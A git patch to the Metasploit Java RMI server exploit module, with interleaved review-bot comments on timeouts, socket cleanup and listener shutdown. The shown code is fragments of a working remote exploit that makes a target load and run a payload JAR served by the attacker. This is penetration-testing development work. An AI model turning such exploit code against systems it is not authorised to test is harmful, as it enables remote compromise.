From 73ce4cbeaa60e71e9bc63476cfab2c19306de49e Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 13 Nov 2014 18:21:19 -0600
Subject: [PATCH] Use primer

---
 .../exploits/multi/misc/java_rmi_server.rb | 35 ++++++++++++-------
 1 file changed, 23 insertions(+), 12 deletions(-)

diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
index 3180875a4d..7fdeb2f2ea 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -8,8 +8,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
@@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged' => false,
       'Payload' => { 'BadChars' => '', 'DisableNops' => true },
       'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10
+        },
       'Targets' =>
         [
           [ 'Generic (Java Payload)',
@@ -76,14 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultTarget' => 0
     ))
 
-    register_options( [ Opt::RPORT(1099) ], self.class)
+    register_options([
+      Opt::RPORT(1099),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+    ], self.class)
     register_autofilter_ports([ 1098, 1099 ])
     register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
   end
 
   def exploit
-    start_service()
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, fail and
+      # don't wait WfsDelay
+      fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
+    end
+  end
+
+  def primer
 
     connect
     jar = rand_text_alpha(rand(8)+1) + '.jar'
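Review bot: The swapped include order is now load-bearing and nothing in the file says so: with `Msf::Exploit::Remote::HttpServer` included after `Tcp` it comes first in the ancestor chain, which is presumably what lets the `super` call added to `exploit` further down this patch reach the HttpServer mixin's `exploit` (the one that starts the listener and invokes `primer`); the mixin bodies are not shown, so that is inferred. A later tidy-up that sorts the includes alphabetically would silently break the module. Add a line above them such as `# Order matters: #exploit relies on super reaching HttpServer#exploit, so HttpServer must be included last`.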
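Review bot: The rescue branch in `exploit` reports the timeout as `Failure::Unknown` and its message has a typo ("a payload requests"); `Failure::TimeoutExpired` is the matching reason, so the line would read `fail_with(Failure::TimeoutExpired, "The HTTP Server didn't get a payload request")`. The explicit `begin`/`end` around the whole method body is redundant in Ruby, the `rescue` clause can sit directly under the `def`. `HTTPDELAY` is an `OptInt` with no range check, and `Timeout.timeout(0)` runs its block with no timeout at all, so a zero value switches the guard off instead of failing fast; rejecting values below 1 here (and saying in the option description that the unit is seconds) would avoid that surprise. The rescue path also never calls `stop_service`, so unless the framework's cleanup tears the listener down (not visible in this hunk) it keeps running after the failure is reported. The comment reads as though the server stops on its own; `# Timeout.timeout interrupts the HttpServer exploit loop; fail now rather than sitting out WfsDelay` states what actually happens.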
@@ -106,11 +122,13 @@ class Metasploit3 < Msf::Exploit::Remote
     buf = ""
     1.upto(6) do
       res = sock.get_once(-1, 5) rescue nil
-      break if not res
+      break unless res
       break if session_created?
       buf << res
     end
+    disconnect
+
 
     if buf =~ /RMI class loader disabled/
       fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
     end
@@ -120,14 +138,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_good("Target #{rhost}:#{rport} may be exploitable...")
-
-    # Wait for the request to be handled
-    1.upto(120) do
-      break if session_created?
-      select(nil, nil, nil, 0.25)
-      handler()
-    end
-
   end
 
   def on_request_uri(cli, request)
@@ -148,6 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     print_status("Replied to request for payload JAR")
+    stop_service
   end
 
 end
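Review bot: `disconnect` runs only when the read loop falls through, and `primer` now executes inside the `Timeout.timeout` block added to `exploit`, so a timeout that fires while `sock.get_once` is blocking leaves the RMI socket open until the module's cleanup (whether the Tcp mixin closes it there is not visible here). Wrapping the loop as `begin` … `ensure` / `disconnect` / `end` releases it on every path and leaves the two `fail_with` calls below untouched. The `rescue nil` modifier on the `get_once` line also makes a reset connection and a quiet one indistinguishable to the new `break unless res`; replacing the modifier with a `begin`/`rescue` that names only the errors it is meant to absorb (`::EOFError`, `::Errno::ECONNRESET`) would let anything else surface. `primer` starts and ends outside this hunk.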
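Review bot: `stop_service` is now called from inside the request handler, i.e. on whatever thread the HTTP server dispatches `on_request_uri` to, and the hunk gives no hint whether stopping the listener from one of its own handlers is safe or whether the response written just above has finished flushing by then; the mixin's behaviour is not shown, so this needs confirming rather than assuming. A short comment stating the intent would also tie this line to the `Timeout.timeout`/`WfsDelay` logic in `exploit`, e.g. `# Shut the listener down once the JAR has been served so the exploit method returns and WfsDelay is left for the session to arrive`. `on_request_uri` begins outside this hunk.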